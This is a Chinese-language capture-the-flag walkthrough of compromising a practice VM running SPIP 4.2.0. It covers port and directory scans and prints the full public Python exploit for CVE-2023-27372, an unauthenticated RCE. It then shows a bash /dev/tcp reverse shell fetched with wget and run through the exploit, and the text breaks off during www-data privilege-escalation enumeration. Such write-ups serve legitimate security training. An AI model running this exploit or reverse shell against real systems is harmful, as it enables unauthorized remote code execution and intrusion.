![\"image-20240410120254533\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404101422017.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nnmap -sCV -p 1-65535 172.20.10.4<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 c0:f6:a1:6a:53:72:be:8d:c2:34:11:e7:e4:9c:94:75 (ECDSA)\n|_ 256 32:1c:f5:df:16:c7:c1:99:2c:d6:26:93:5a:43:57:59 (ED25519)\n80\/tcp open http Apache httpd 2.4.52 ((Ubuntu))\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n|_http-title: Mi sitio SPIP\n|_http-generator: SPIP 4.2.0\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nferoxbuster -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 2 -s 200 301 302<\/code><\/pre>\n ___ ___ __ __ __ __ __ ___\n|__ |__ |__) |__) | \/ ` \/ \\ \\_\/ | | \\ |__\n| |___ | \\ | \\ | \\__, \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13 ver: 2.10.2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf Target Url \u2502 http:\/\/172.20.10.4\n \ud83d\ude80 Threads \u2502 50\n \ud83d\udcd6 Wordlist \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c Status Codes \u2502 [200, 301, 302]\n \ud83d\udca5 Timeout (secs) \u2502 7\n \ud83e\udda1 User-Agent \u2502 feroxbuster\/2.10.2\n \ud83d\udc89 Config File \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e Extract Links \u2502 true\n \ud83c\udfc1 HTTP methods \u2502 [GET]\n \ud83d\udd03 Recursion Depth \u2502 2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1 Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n200 GET 9l 14w 186c http:\/\/172.20.10.4\/squelettes-dist\/css\/font.css\n200 GET 612l 1862w 20633c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/lity\/js\/lity.mediabox.js\n200 GET 586l 1191w 8967c http:\/\/172.20.10.4\/squelettes-dist\/css\/typo.css\n200 GET 36l 85w 1272c http:\/\/172.20.10.4\/prive\/spip_pass.html\n200 GET 156l 455w 3750c http:\/\/172.20.10.4\/prive\/paquet.dtd\n200 GET 196l 1309w 11775c http:\/\/172.20.10.4\/prive\/xhtml-lat1.ent\n200 GET 1l 13w 141c http:\/\/172.20.10.4\/prive\/informer_auteur.html\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/prive\/informer_auteur_fonctions.php\n301 GET 9l 28w 310c http:\/\/172.20.10.4\/local => http:\/\/172.20.10.4\/local\/\n200 GET 4l 23w 187c http:\/\/172.20.10.4\/local\/CACHEDIR.TAG\n200 GET 3l 13w 83c http:\/\/172.20.10.4\/local\/remove.txt\n200 GET 1l 7w 436c http:\/\/172.20.10.4\/local\/config.txt\n301 GET 9l 28w 315c http:\/\/172.20.10.4\/javascript => http:\/\/172.20.10.4\/javascript\/\n301 GET 9l 28w 311c http:\/\/172.20.10.4\/vendor => http:\/\/172.20.10.4\/vendor\/\n301 GET 9l 28w 311c http:\/\/172.20.10.4\/config => http:\/\/172.20.10.4\/config\/\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/vendor\/autoload.php\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/config\/connect.php\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/config\/ecran_securite.php\n200 GET 3l 13w 83c http:\/\/172.20.10.4\/config\/remove.txt\n301 GET 9l 28w 308c http:\/\/172.20.10.4\/tmp => http:\/\/172.20.10.4\/tmp\/\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/tmp\/cron.lock\n200 GET 1l 2w 14c http:\/\/172.20.10.4\/tmp\/meta_cache.php\n200 GET 674l 5644w 35147c http:\/\/172.20.10.4\/LICENSE\n200 GET 1l 1w 33c http:\/\/172.20.10.4\/tmp\/menu-rubriques-cache.txt\n200 GET 84l 455w 35410c http:\/\/172.20.10.4\/tmp\/plugin_xml_cache.gz\n200 GET 4l 23w 187c http:\/\/172.20.10.4\/tmp\/CACHEDIR.TAG\n200 GET 56l 146w 1491c http:\/\/172.20.10.4\/prive\/javascript\/jquery.autosave.js\n200 GET 140l 202w 1497c http:\/\/172.20.10.4\/squelettes-dist\/css\/reset.css\n301 GET 9l 28w 308c http:\/\/172.20.10.4\/IMG => http:\/\/172.20.10.4\/IMG\/\n200 GET 3l 13w 80c http:\/\/172.20.10.4\/IMG\/remove.txt\n200 GET 39l 134w 1189c http:\/\/172.20.10.4\/squelettes-dist\/css\/form.css\n200 GET 101l 210w 1667c http:\/\/172.20.10.4\/squelettes-dist\/css\/clear.css\n200 GET 93l 400w 3103c http:\/\/172.20.10.4\/squelettes-dist\/css\/layout.css\n200 GET 880l 3034w 28519c http:\/\/172.20.10.4\/plugins-dist\/porte_plume\/javascript\/jquery.markitup_pour_spip.js\n200 GET 590l 1269w 16249c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/lib\/lity\/lity.js\n200 GET 1162l 4111w 38533c http:\/\/172.20.10.4\/prive\/javascript\/ajaxCallback.js\n200 GET 256l 892w 8312c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/javascript\/spip.mediabox.js\n200 GET 1549l 5417w 42242c http:\/\/172.20.10.4\/prive\/javascript\/jquery.form.js\n200 GET 705l 1688w 22638c http:\/\/172.20.10.4\/local\/cache-js\/jsdyn-javascript_porte_plume_start_js-cffe9b6f.js\n200 GET 206l 419w 4438c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/lity\/css\/lity.mediabox.css\n200 GET 168l 415w 5494c http:\/\/172.20.10.4\/plugins-dist\/porte_plume\/javascript\/jquery.previsu_spip.js\n200 GET 340l 1179w 10765c http:\/\/172.20.10.4\/squelettes-dist\/css\/theme.css\n200 GET 61l 102w 1565c http:\/\/172.20.10.4\/prive\/javascript\/jquery.placeholder-label.js\n200 GET 96l 238w 1662c http:\/\/172.20.10.4\/squelettes-dist\/css\/media.css\n200 GET 59l 166w 5368c http:\/\/172.20.10.4\/local\/cache-css\/cssdyn-css_barre_outils_icones_css-8362435d.css\n200 GET 209l 443w 3798c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/lib\/lity\/lity.css\n200 GET 395l 945w 7784c http:\/\/172.20.10.4\/plugins-dist\/porte_plume\/css\/barre_outils.css\n200 GET 126l 461w 7518c http:\/\/172.20.10.4\/spip.php\n200 GET 163l 316w 2849c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/lity\/skins\/_simple-dark\/lity.css\n200 GET 107l 232w 2093c http:\/\/172.20.10.4\/squelettes-dist\/css\/links.css\n200 GET 212l 925w 7638c http:\/\/172.20.10.4\/squelettes-dist\/css\/spip.css\n200 GET 1l 5w 120c http:\/\/172.20.10.4\/squelettes-dist\/puce.gif\n200 GET 26l 45w 1389c http:\/\/172.20.10.4\/squelettes-dist\/rss_forum_syndic.html\n200 GET 30l 42w 1012c http:\/\/172.20.10.4\/squelettes-dist\/ical.html\n200 GET 24l 38w 739c http:\/\/172.20.10.4\/squelettes-dist\/calendrier.html\n200 GET 124l 248w 3867c http:\/\/172.20.10.4\/squelettes-dist\/recherche.html\n200 GET 78l 179w 3100c http:\/\/172.20.10.4\/squelettes-dist\/backend-breves.html\n200 GET 86l 205w 3378c http:\/\/172.20.10.4\/squelettes-dist\/article.html\n200 GET 16l 22w 322c http:\/\/172.20.10.4\/squelettes-dist\/paquet.xml\n200 GET 53l 118w 2233c http:\/\/172.20.10.4\/squelettes-dist\/forum.html\n200 GET 55l 139w 2334c http:\/\/172.20.10.4\/squelettes-dist\/inc-rss-item.html\n200 GET 26l 45w 1385c http:\/\/172.20.10.4\/squelettes-dist\/rss_forum_breve.html\n200 GET 10993l 45090w 293671c http:\/\/172.20.10.4\/prive\/javascript\/jquery.js\n200 GET 147l 465w 4150c http:\/\/172.20.10.4\/prive\/javascript\/js.cookie.js\n200 GET 126l 461w 7514c http:\/\/172.20.10.4\/\n200 GET 237l 1744w 13848c http:\/\/172.20.10.4\/prive\/xhtml-symbol.ent\n200 GET 66l 488w 3660c http:\/\/172.20.10.4\/prive\/spip_style.css\n200 GET 15l 46w 439c http:\/\/172.20.10.4\/prive\/spip_style_print.css\n200 GET 14l 49w 556c http:\/\/172.20.10.4\/prive\/style_prive.css.html\n200 GET 43l 100w 1615c http:\/\/172.20.10.4\/prive\/login.html\n200 GET 80l 527w 4131c http:\/\/172.20.10.4\/prive\/xhtml-special.ent\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/prive\/ajax_selecteur_fonctions.php\n200 GET 8l 12w 220c http:\/\/172.20.10.4\/prive\/ajax_item_pick.html\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/prive\/ajax_item_pick_fonctions.php\n200 GET 371l 1466w 13268c http:\/\/172.20.10.4\/prive\/spip_admin.css\n200 GET 8l 12w 199c http:\/\/172.20.10.4\/prive\/ajax_selecteur.html\n200 GET 122l 211w 5910c http:\/\/172.20.10.4\/prive\/ical_prive.html\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/config\/chmod.php\n200 GET 1l 2w 14c http:\/\/172.20.10.4\/config\/cles.php\n200 GET 1l 1w 10c http:\/\/172.20.10.4\/tmp\/job_queue_next.txt\n200 GET 3l 13w 83c http:\/\/172.20.10.4\/tmp\/remove.txt\n200 GET 36l 67w 1504c http:\/\/172.20.10.4\/squelettes-dist\/backend.html\n200 GET 2l 3w 97c http:\/\/172.20.10.4\/squelettes-dist\/favicon.ico.html\n200 GET 21l 121w 807c http:\/\/172.20.10.4\/squelettes-dist\/CHANGELOG.md\n200 GET 76l 133w 2297c http:\/\/172.20.10.4\/squelettes-dist\/sommaire.html\n200 GET 26l 45w 1397c http:\/\/172.20.10.4\/squelettes-dist\/rss_forum_rubrique.html\n200 GET 120l 321w 3558c http:\/\/172.20.10.4\/squelettes-dist\/backend.xslt.html\n200 GET 34l 80w 1345c http:\/\/172.20.10.4\/squelettes-dist\/identifiants.html\n200 GET 98l 222w 3475c http:\/\/172.20.10.4\/squelettes-dist\/site.html\n200 GET 1l 3w 130c http:\/\/172.20.10.4\/squelettes-dist\/puce_rtl.gif\n200 GET 41l 65w 1235c http:\/\/172.20.10.4\/squelettes-dist\/contact.html\n200 GET 26l 45w 1422c http:\/\/172.20.10.4\/squelettes-dist\/rss_forum_article.html\n200 GET 145l 320w 4758c http:\/\/172.20.10.4\/squelettes-dist\/mot.html\n200 GET 48l 89w 1894c http:\/\/172.20.10.4\/squelettes-dist\/404.html\n200 GET 26l 46w 1414c http:\/\/172.20.10.4\/squelettes-dist\/rss_forum_thread.html\n200 GET 85l 202w 3092c http:\/\/172.20.10.4\/squelettes-dist\/breve.html\n200 GET 161l 349w 5459c http:\/\/172.20.10.4\/squelettes-dist\/rubrique.html\n200 GET 61l 166w 1975c http:\/\/172.20.10.4\/squelettes-dist\/sitemap.xml.html\n200 GET 82l 160w 2616c http:\/\/172.20.10.4\/squelettes-dist\/auteur.html\n200 GET 40l 64w 1171c http:\/\/172.20.10.4\/squelettes-dist\/plan.html\n200 GET 37l 44w 868c http:\/\/172.20.10.4\/squelettes-dist\/nouveautes.html\n200 GET 1l 27w 9052c http:\/\/172.20.10.4\/squelettes-dist\/spip.ico\n200 GET 24l 47w 536c http:\/\/172.20.10.4\/squelettes-dist\/robots.txt.html\n301 GET 9l 28w 311c http:\/\/172.20.10.4\/ecrire => http:\/\/172.20.10.4\/ecrire\/\n301 GET 9l 28w 315c http:\/\/172.20.10.4\/ecrire\/xml => http:\/\/172.20.10.4\/ecrire\/xml\/\n301 GET 9l 28w 319c http:\/\/172.20.10.4\/ecrire\/plugins => http:\/\/172.20.10.4\/ecrire\/plugins\/\n301 GET 9l 28w 318c http:\/\/172.20.10.4\/ecrire\/public => http:\/\/172.20.10.4\/ecrire\/public\/\n301 GET 9l 28w 318c http:\/\/172.20.10.4\/ecrire\/action => http:\/\/172.20.10.4\/ecrire\/action\/\n301 GET 9l 28w 319c http:\/\/172.20.10.4\/ecrire\/install => http:\/\/172.20.10.4\/ecrire\/install\/\n301 GET 9l 28w 315c http:\/\/172.20.10.4\/ecrire\/src => http:\/\/172.20.10.4\/ecrire\/src\/\n301 GET 9l 28w 316c http:\/\/172.20.10.4\/ecrire\/lang => http:\/\/172.20.10.4\/ecrire\/lang\/\n301 GET 9l 28w 316c http:\/\/172.20.10.4\/ecrire\/exec => http:\/\/172.20.10.4\/ecrire\/exec\/\n301 GET 9l 28w 316c http:\/\/172.20.10.4\/ecrire\/base => http:\/\/172.20.10.4\/ecrire\/base\/\n301 GET 9l 28w 315c http:\/\/172.20.10.4\/ecrire\/inc => http:\/\/172.20.10.4\/ecrire\/inc\/\n301 GET 9l 28w 316c http:\/\/172.20.10.4\/ecrire\/auth => http:\/\/172.20.10.4\/ecrire\/auth\/\n301 GET 9l 28w 325c http:\/\/172.20.10.4\/ecrire\/notifications => http:\/\/172.20.10.4\/ecrire\/notifications\/\n301 GET 9l 28w 316c http:\/\/172.20.10.4\/ecrire\/urls => http:\/\/172.20.10.4\/ecrire\/urls\/\n301 GET 9l 28w 315c http:\/\/172.20.10.4\/ecrire\/req => http:\/\/172.20.10.4\/ecrire\/req\/\n301 GET 9l 28w 310c http:\/\/172.20.10.4\/prive => http:\/\/172.20.10.4\/prive\/\n301 GET 9l 28w 317c http:\/\/172.20.10.4\/ecrire\/genie => http:\/\/172.20.10.4\/ecrire\/genie\/\n301 GET 9l 28w 322c http:\/\/172.20.10.4\/javascript\/jquery => http:\/\/172.20.10.4\/javascript\/jquery\/\n[###################>] - 4m 645730\/661832 0s found:121 errors:0 \n[####################] - 4m 661832\/661832 0s found:121 errors:0 \n[####################] - 4m 220546\/220546 893\/s http:\/\/172.20.10.4\/ \n[####################] - 4s 220546\/220546 54002\/s http:\/\/172.20.10.4\/plugins-dist\/ => Directory listing\n[####################] - 5s 220546\/220546 47872\/s http:\/\/172.20.10.4\/prive\/ => Directory listing\n[####################] - 4s 220546\/220546 56133\/s http:\/\/172.20.10.4\/local\/ => Directory listing\n[####################] - 4m 220546\/220546 870\/s http:\/\/172.20.10.4\/javascript\/ \n[####################] - 5s 220546\/220546 48123\/s http:\/\/172.20.10.4\/vendor\/ => Directory listing\n[####################] - 5s 220546\/220546 47614\/s http:\/\/172.20.10.4\/config\/ => Directory listing\n[####################] - 5s 220546\/220546 44367\/s http:\/\/172.20.10.4\/tmp\/ => Directory listing\n[####################] - 0s 220546\/220546 27568250\/s http:\/\/172.20.10.4\/IMG\/ => Directory listing\n[####################] - 4s 220546\/220546 56305\/s http:\/\/172.20.10.4\/squelettes-dist\/ => Directory listing\n[####################] - 4m 220546\/220546 894\/s http:\/\/172.20.10.4\/ecrire\/<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.4<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.4\n+ Target Hostname: 172.20.10.4\n+ Target Port: 80\n+ Start Time: 2024-04-10 00:05:09 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.52 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: Uncommon header 'composed-by' found, with contents: SPIP 4.2.0 @ www.spip.net + http:\/\/172.20.10.4\/local\/config.txt.\n+ \/: Uncommon header 'x-spip-cache' found, with contents: 86400.\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ Apache\/2.4.52 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/config\/: Directory indexing found.\n+ \/config\/: Configuration information may be available remotely.\n+ \/tmp\/: Directory indexing found.\n+ \/tmp\/: This might be interesting.\n+ \/htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.\n+ \/composer.json: PHP Composer configuration file reveals configuration information. See: https:\/\/getcomposer.org\/\n+ \/composer.lock: PHP Composer configuration file reveals configuration information. See: https:\/\/getcomposer.org\/\n+ \/README.md: Readme Found.\n+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host\n+ End Time: 2024-04-10 00:05:34 (GMT-4) (25 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u914d\u7f6e\u67e5\u770b<\/h3>\nwhatweb 172.20.10.4<\/code><\/pre>\nhttp:\/\/172.20.10.4 [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.52 (Ubuntu)], IP[172.20.10.4], JQuery, MetaGenerator[SPIP 4.2.0], SPIP[4.2.0][http:\/\/172.20.10.4\/local\/config.txt], Script[text\/javascript], Title[Mi sitio SPIP], UncommonHeaders[composed-by,x-spip-cache]<\/code><\/pre>\n![\"image-20240410120633650\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div>
\n<\/div><\/p>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n
<\/div><\/p>\nhttp:\/\/172.20.10.4\/config\/remove.txt\nVous pouvez effacer ce fichier sans dommages.\nYou can safely remove this file.<\/code><\/pre>\n<\/div><\/p>\nhttp:\/\/172.20.10.4\/tmp\/job_queue_next.txt\n1712729014<\/code><\/pre>\nhttp:\/\/172.20.10.4\/tmp\/log\/mysql.log\n......\n2023-10-03 15:42:58 192.168.0.101 (pid 4802) :Pri:HS: Echec mysqli_connect. Erreur : Access denied for user 'spipuser'@'localhost' (using password: YES)\n2023-10-03 15:43:53 192.168.0.101 (pid 4742) :Pri:HS: Echec mysqli_connect. Erreur : Access denied for user 'admin'@'localhost' (using password: NO)\n......<\/code><\/pre>\n\u5176\u5b9e\u4e1c\u897f\u6709\u5f88\u591a\uff0c\u4f46\u662f\u53d1\u73b0\u89c9\u5f97\u6709\u7528\u7684\u6bd4\u8f83\u5c11\uff0c\u6162\u6162\u770b\uff1a<\/p>\n
http:\/\/172.20.10.4\/tmp\/cache\/spip_versions_list.json\n{\n "api": 2,\n "versions": {\n "dev": "spip\/dev\/spip-master.zip",\n "4.2.11": "spip\/archives\/spip-v4.2.11.zip",\n "4.1.15": "spip\/archives\/spip-v4.1.15.zip",\n "4.0.11": "spip\/archives\/spip-v4.0.11.zip",\n "3.2.19": "spip\/archives\/spip-v3.2.19.zip"\n },\n "default_branch": "4.2",\n "requirements": {\n "php": {\n "master": "8.1.0",\n "4.2": "7.4.0",\n "4.1": "7.4.0",\n "4.0": "7.3.0",\n "3.2": "5.4.0"\n }\n }\n}<\/code><\/pre>\nhttp:\/\/172.20.10.4\/tmp\/CACHEDIR.TAG\nSignature: 8a477f597d28d172789f06886806bc55\n# This file is a cache directory tag created by SPIP.\n# For information about cache directory tags, see:\n# http:\/\/www.brynosaurus.com\/cachedir\/<\/code><\/pre>\n\u751a\u81f3\u8fd8\u6709\u538b\u7f29\u5305\uff0c\u4f46\u662f\u91cc\u9762\u6ca1\u6709\u4ec0\u4e48\u6709\u4ef7\u503c\u7684\u4fe1\u606f\uff0c\u57fa\u672c\u662f\u914d\u7f6e\u4fe1\u606f\u3002<\/p>\n
\u8fd8\u627e\u5230\u4e86\u767b\u5f55\u9875\u9762\uff1a<\/p>\n
http:\/\/172.20.10.4\/spip.php<\/code><\/pre>\n<\/div><\/p>\n\u5176\u4ed6\u7684\u6211\u4f3c\u4e4e\u6ca1\u6709\u53d1\u73b0\u6bd4\u8f83\u6709\u4ef7\u503c\u7684\uff0c\u5148\u5c1d\u8bd5\u8fdb\u884c\u7b80\u5355\u7684\u5f31\u5bc6\u7801\u548c\u4e07\u80fd\u5bc6\u7801\uff0c\u7136\u540e\u5c1d\u8bd5\u8fdb\u884csql\u6ce8\u5165\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5sql\u6ce8\u5165\uff1a<\/p>\n
POST \/spip.php?page=login&url=%2Fecrire%2F&lang=fr HTTP\/1.1\nHost: 172.20.10.4\nContent-Length: 265\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/172.20.10.4\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/172.20.10.4\/spip.php?page=login&url=%2Fecrire%2F&lang=fr\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\npage=login&url=%2Fecrire%2F&lang=fr&formulaire_action=login&formulaire_action_args=gYHWt7rAiJ9zrPAiAI6XQl5eYzZa62dsPenl8w0EiILo%2BAbt%2B4GWnfiRsFbKvBojvnPYjDzo%2FzQ0ghyTk3tUUn0xV1PZs03PSYbSQKSgN5MjbMjTVA%3D%3D&formulaire_action_sign=&var_login=admin&password=123456<\/code><\/pre>\n<\/div><\/p>\n\u4f3c\u4e4e\u4e0d\u592a\u9614\u4ee5\uff0c\u5c1d\u8bd5\u5fd8\u8bb0\u5bc6\u7801\uff1a<\/p>\n
http:\/\/172.20.10.4\/spip.php?page=spip_pass<\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5LFI\uff1a<\/p>\n
<\/div><\/p>\n\u67e5\u627e\u6f0f\u6d1e<\/h3>\n
\u6328\u4e2a\u67e5\u627e\u662f\u5426\u5b58\u5728\u5386\u53f2\u6f0f\u6d1e\uff1a<\/p>\n
<\/div><\/p>\n\u9776\u673a\u521b\u7acb\u65f6\u95f4\u57282023-10-18<\/code>\uff0c\u5bfb\u627e\u5728\u6b64\u4e4b\u524d\u7684\u6f0f\u6d1e\uff1a<\/p>\nCMS<\/h4>\n
<\/div><\/p>\n#!\/usr\/bin\/env python3\n# -*- coding: utf-8 -*-\n\n# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)\n# Google Dork: inurl:"\/spip.php?page=login"\n# Date: 19\/06\/2023 \u65f6\u95f4\u4e0a\u5728\u9776\u573a\u51fa\u6765\u63a5\u8fd1\u534a\u5e74\u524d\u4e86\uff0c\u5e94\u8be5\u662f\u8fd9\u4e2a\uff01\n# Exploit Author: nuts7 (https:\/\/github.com\/nuts7\/CVE-2023-27372)\n# Vendor Homepage: https:\/\/www.spip.net\/\n# Software Link: https:\/\/files.spip.net\/spip\/archives\/\n# Version: < 4.2.1 (Except few fixed versions indicated in the description)\n# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0\n# CVE reference : CVE-2023-27372 (coiffeur)\n# CVSS : 9.8 (Critical)\n#\n# Vulnerability Description:\n#\n# SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.\n# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.\n#\n# Usage: python3 CVE-2023-27372.py http:\/\/example.com\n\nimport argparse\nimport bs4\nimport html\nimport requests\n\ndef parseArgs():\n parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")\n parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")\n parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")\n parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")\n return parser.parse_args()\n\ndef get_anticsrf(url):\n r = requests.get('%s\/spip.php?page=spip_pass' % url, timeout=10)\n soup = bs4.BeautifulSoup(r.text, 'html.parser')\n csrf_input = soup.find('input', {'name': 'formulaire_action_args'})\n if csrf_input:\n csrf_value = csrf_input['value']\n if options.verbose:\n print("[+] Anti-CSRF token found : %s" % csrf_value)\n return csrf_value\n else:\n print("[-] Unable to find Anti-CSRF token")\n return -1\n\ndef send_payload(url, payload):\n data = {\n "page": "spip_pass",\n "formulaire_action": "oubli",\n "formulaire_action_args": csrf,\n "oubli": payload\n }\n r = requests.post('%s\/spip.php?page=spip_pass' % url, data=data)\n if options.verbose:\n print("[+] Execute this payload : %s" % payload)\n return 0\n\nif __name__ == '__main__':\n options = parseArgs()\n\n requests.packages.urllib3.disable_warnings()\n requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'\n try:\n requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'\n except AttributeError:\n pass\n\n csrf = get_anticsrf(url=options.url)\n send_payload(url=options.url, payload="s:%s:\\"<?php system('%s'); ?>\\";" % (20 + len(options.command), options.command))<\/code><\/pre>\n\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n
# kali1\necho 'bash -c "exec bash -i &>\/dev\/tcp\/172.20.10.8\/1234 <&1"' > revershell.sh\npython3 -m http.server 2345\n# kali2\nnc -lvnp 1234\n# kali3\npython3 51536.py -u http:\/\/172.20.10.4 -c 'wget http:\/\/172.20.10.8:2345\/revershell.sh'\npython3 51536.py -u http:\/\/172.20.10.4 -c 'bash revershell.sh'<\/code><\/pre>\n<\/div><\/p>\n\uff08\u6211\u6bd4\u8f83\u4e71\uff0c\u968f\u4fbf\u641e\u7684\uff0c\u548c\u4e0a\u9762\u63cf\u8ff0\u7684\u4e0d\u4e00\u6837\uff09<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@pipy:\/var\/www\/html$ ls\nCHANGELOG.md LICENSE SECURITY.md composer.lock ecrire index.php plugins-dist prive spip.php spip.svg tmp\nIMG README.md composer.json config htaccess.txt local plugins-dist.json revershell.sh spip.png squelettes-dist vendor\n(remote) www-data@pipy:\/var\/www\/html$ cat config\ncat: config: Is a directory\n(remote) www-data@pipy:\/var\/www\/html$ ls -F \nCHANGELOG.md LICENSE SECURITY.md composer.lock ecrire\/ index.php plugins-dist\/ prive\/ spip.php spip.svg tmp\/\nIMG\/ README.md composer.json config\/ htaccess.txt local\/ plugins-dist.json revershell.sh spip.png squelettes-dist\/ vendor\/\n(remote) www-data@pipy:\/var\/www\/html$ cd config\n(remote) www-data@pipy:\/var\/www\/html\/config$ ls\nchmod.php cles.php connect.php ecran_securite.php remove.txt\n(remote) www-data@pipy:\/var\/www\/html\/config$ cd ..\/ \n(remote) www-data@pipy:\/var\/www\/html$ cat SECURITY.md \n# Security Policy\n\n## Signaler une faille de s\u00e9curit\u00e9\n\nVoir https:\/\/www.spip.net\/fr_article6688.html\n\n## Reporting a Vulnerability\n\nSee https:\/\/www.spip.net\/en_article6689.html(remote) www-data@pipy:\/var\/www\/html$ cd ..\/\n(remote) www-data@pipy:\/var\/www$ ls -la\ntotal 20\ndrwxr-xr-x 4 www-data www-data 4096 Oct 5 2023 .\ndrwxr-xr-x 14 root root 4096 Oct 2 2023 ..\n-rw------- 1 www-data www-data 130 Oct 5 2023 .bash_history\ndrwxrwxrwx 3 www-data www-data 4096 Oct 5 2023 .local\ndrwxr-xr-x 11 www-data www-data 4096 Apr 10 04:46 html\n(remote) www-data@pipy:\/var\/www$ history .bash_history \nbash: history: .bash_history: numeric argument required\n(remote) www-data@pipy:\/var\/www$ 